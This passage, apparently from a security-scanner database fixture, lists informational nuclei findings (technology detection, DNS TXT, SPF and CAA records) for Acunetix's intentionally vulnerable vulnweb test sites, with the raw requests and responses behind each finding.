title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 87, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "font-awesome", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:42.007Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 88, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.098Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 25732\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 25732\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 89, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.189Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 7108\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 7108\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 90, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.279Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 6465\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 6465\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 91, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.365Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 49345\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 49345\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 92, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.517Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 39373\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 39373\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 93, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.609Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 59148\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 59148\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86393\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 94, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.691Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12475\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12475\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3594\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 95, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.774Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42504\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42504\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 96, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.861Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58030\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58030\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3593\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 97, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/spf-record-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/spf-record-detect", + "template_id": "spf-record-detect", + "matcher_name": "", + "name": "SPF Record - Detection", + "severity": 0, + "description": "An SPF TXT record was detected\n", + "impact": null, + "remediation": null, + "extracted_results": "[\"v=spf1 -all\\\"\"]", + "references": "['https://www.mimecast.com/content/how-to-create-an-spf-txt-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:42.951Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 12862\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 12862\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntesthtml5.vulnweb.com.\t3594\tIN\tTXT\t"v=spf1 -all"\n", + "is_llm_used": false, + "tags": [ + 1, + 3 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 98, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:43.055Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 25516\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 25516\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 99, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:43.142Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link 